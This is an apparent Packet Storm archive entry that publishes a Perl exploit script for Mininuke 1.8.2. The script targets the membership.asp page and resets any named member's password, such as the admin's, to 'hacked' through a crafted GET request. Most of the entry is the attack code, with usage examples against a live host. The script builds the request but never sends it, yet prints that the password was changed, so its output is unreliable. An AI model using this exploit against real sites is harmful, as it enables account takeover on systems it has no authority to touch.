minimuke.pl.txt

2006-02-02T00:00:00
ID PACKETSTORM:43494
Type packetstorm
Reporter Mustafa Can Bjorn
Modified 2006-02-02T00:00:00

Description

                                        
                                            `I create exploit for a bug at Mininuke ; this bug at "membership.asp"  
and you can with this exploit change members password :)  
if you inject:  
" /membership.asp&pass=[New password]&passa=[confirm new password]&x=[member name] "  
This bug found by nukedx & exploit by Hessam-x  
  
---------  
+ APP name : Mininuke  
+ Version : 1.8.2  
+ exploit by: Hessam-x  
+ Type : High  
+ Des : with this exploit you can change user's password  
+ IHST - Iran Hackerz Security Team (Hackerz.ir)  
+ KuT - Kachal667 under9round team (Kachal667.com)  
  
Exploit type : Perl  
[-- PERL C0DE --]  
  
  
#!/usr/bin/perl  
#--------------------------------------------------------#  
#- => Mininuke 1.8.2  
#- Founder nukedx & Exploit by Hessam-x  
#- www.Hackerz.ir Iran Hackers Security Team  
#- Hessam-x <> irc0d3r|at|Yahoo.com  
#- Spescial Thanx : all iranian Hackers & Str0ke  
#- IR4N H4CK3RZ S3CURITY T34M  
#--------------------------------------------------------#  
# This bug at Membership.asp  
use IO::Socket;  
  
if (@ARGV < 1)  
{  
print "\n============================================\n";  
print "\n IRAN HACKERZ SECURITY TEAM \n";  
print "\n============================================\n";  
print "\n ";  
print "\n MININUKE 1.8.2 ";  
print "\n Exploit by Hessam-x & Found by nukedx ";  
print "\n www.Hackerz.ir Iran Hackers Security Team ";  
print "\n ";  
print "\n============================================\n";  
print "Usage : minimuke.pl [HOST] [Member name]\n\n";  
  
print "Examples:\n\n";  
print " mininuke.pl www.Site.com admin \n";  
exit();  
}  
  
my $host = $ARGV[0];  
my $usero= $ARGV[1];  
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,  
PeerPort => "80" );  
  
unless ($remote) { die "Cannot connect to $host" }  
  
print "[+]connected\n";  
  
$addr = "GET /membership.asp?pass=hacked&passa=hacked&x=$usero&B1=Send HTTP/1.0\n";  
$addr .= "Host: $host\n\n\n\n";  
print "\n";  
print "[+]Wait...";  
sleep(5);  
print "Wait For Changing Password ...\n";  
print "[+] :D OK \n";  
print "Username: $usero\n";  
print "Password: hacked\n\n";  
  
[/-- PERL CODE --]  
  
# Hessam-x (Hessam M.Salehi)- www.hessam.org  
`